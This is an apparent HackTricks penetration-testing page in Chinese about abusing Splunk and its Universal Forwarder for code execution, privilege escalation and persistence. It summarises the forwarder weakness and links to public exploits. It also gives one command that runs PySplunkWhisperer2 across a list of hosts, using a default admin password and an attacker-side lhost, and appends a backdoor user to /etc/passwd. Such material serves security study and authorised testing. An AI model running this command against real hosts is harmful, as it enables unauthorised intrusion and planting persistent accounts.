Splunk LPE 和持久性
Reading time: 4 minutes
tip
学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。
如果在内部或外部枚举一台机器时发现Splunk正在运行(端口8090),如果你幸运地知道任何有效凭据,你可以利用Splunk服务以运行Splunk的用户身份执行一个shell。如果是root在运行,你可以提升权限到root。
此外,如果你已经是root并且Splunk服务不仅在localhost上监听,你可以窃取Splunk服务的密码文件并破解密码,或者添加新的凭据。并在主机上保持持久性。
在下面的第一张图片中,你可以看到Splunkd网页的样子。
Splunk Universal Forwarder Agent 漏洞总结
有关更多详细信息,请查看帖子 https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/。这只是一个总结:
漏洞概述: 针对Splunk Universal Forwarder Agent (UF) 的漏洞允许拥有代理密码的攻击者在运行该代理的系统上执行任意代码,可能会危及整个网络。
关键点:
- UF代理不验证传入连接或代码的真实性,使其容易受到未经授权的代码执行攻击。
- 常见的密码获取方法包括在网络目录、文件共享或内部文档中查找。
- 成功利用可能导致在受损主机上获得SYSTEM或root级别的访问权限、数据外泄和进一步的网络渗透。
漏洞执行:
- 攻击者获取UF代理密码。
- 利用Splunk API向代理发送命令或脚本。
- 可能的操作包括文件提取、用户账户操作和系统妥协。
影响:
- 在每个主机上完全网络妥协,具有SYSTEM/root级别的权限。
- 可能禁用日志记录以逃避检测。
- 安装后门或勒索软件。
利用示例命令:
for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done
可用的公共漏洞:
- https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2
- https://www.exploit-db.com/exploits/46238
- https://www.exploit-db.com/exploits/46487
滥用 Splunk 查询
有关更多详细信息,请查看帖子 https://blog.hrncirik.net/cve-2023-46214-analysis
tip
学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。